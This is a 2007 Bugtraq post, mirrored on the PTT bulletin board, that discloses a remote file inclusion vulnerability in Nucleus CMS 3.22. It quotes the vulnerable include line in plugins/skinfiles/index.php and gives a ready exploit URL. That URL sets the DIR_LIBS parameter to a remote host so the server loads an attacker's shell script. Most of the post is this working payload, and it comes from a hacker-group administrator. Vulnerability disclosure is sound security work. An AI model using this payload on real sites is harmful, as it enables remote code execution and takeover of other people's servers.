批踢踢實業坊
›
看板
Bugtraq
關於我們
聯絡資訊
返回看板
發信人
alijsb@yahoo.com,
看板
Bugtraq
標 題
nucleus 3.22 >> RFI
發信站
NCTU CSIE FreeBSD Server (Thu Apr 26 14:00:21 2007)
轉信站
ptt!FreeBSD.csie.NCTU!not-for-mail
VENDOR :
http://nucleuscms.org/
BY : s3rv3r_hack3r (hackerz.ir admin) bug: nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS . 'PLUGINADMIN.php'); Exloit:
http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell